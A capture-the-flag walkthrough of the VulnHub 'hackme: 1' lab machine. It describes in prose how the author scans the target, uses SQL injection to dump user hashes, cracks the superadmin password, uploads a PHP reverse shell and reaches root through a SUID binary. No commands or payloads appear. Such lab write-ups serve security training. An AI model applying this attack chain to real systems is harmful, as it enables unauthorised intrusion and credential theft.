VulnHub: hackme: 1

Initial Foothold

  1. Network discovery

My target is 192.168.60.129.

2. TCP Portscan

There’re 2 services: ssh and http

3. UDP scan

4. OS and service scan

5. Vuln scan

There’re HTTP pages the I can access.

Service Enumeration

  • SSH

Connect

  • HTTP
  1. nikto scan

2. Directory scan

3. Access site

There’s a username and password requirement and I also can sign up.

View page source

Access /uploads/

Register new user

Log in

There’s a search function and 3 columns. My guess is search function calls SQL query.

Exploitation

  1. Test for SQL injection

No data

Try another test query

Succeeded. Next to continue to inject query to retrieve some data.

There’re 3 columns, my guess is I’ll union w/ 1,2,3. No need to test for column numbers like this:

So my query is:

As predicted, there’re 3 columns needed for this query.

Retrieve trivial data

The host version is 5.7.25–0ubuntu0.18.10.2.

The hostname is hackme.

Database is webapphacking.

Get table name

I have 2 tables: books and users.

Table: users is interesting. I will find its columns.

I have 5 columns: id, user, password, name, and address.

I need 3 columns: id, user, and password.

Copy it and organize w/ editor for easier viewing.

My intersintes is ‘superadmin’

Copy the hash and crack w/ crackstation. Now I have the password.

Login as superadmin.

I can upload files. I’ll try to upload reverse shell.

Prepare a reverse shell PHP script.

Prepare listener

Upload the file

Access it via /uploads/, click the file.

Back to the listener, now I got the connection.

Test it

Import TTY shell

Privilege Escalation

  1. Explore directory

I got MySQL root’s credential.

Try to re-use it via SSH service.

Failed!!!

I found this ‘touchmenot’ file.

Let’s try to run it

Now I’m root.

The reason behind running it and get root shell immediately is SUID. Normally, you have to verify for SUID w/ this command

From the result, you can continue the escalation process. This time, I’m just lucky w/ directory enumeration process and save a lot of time finding it.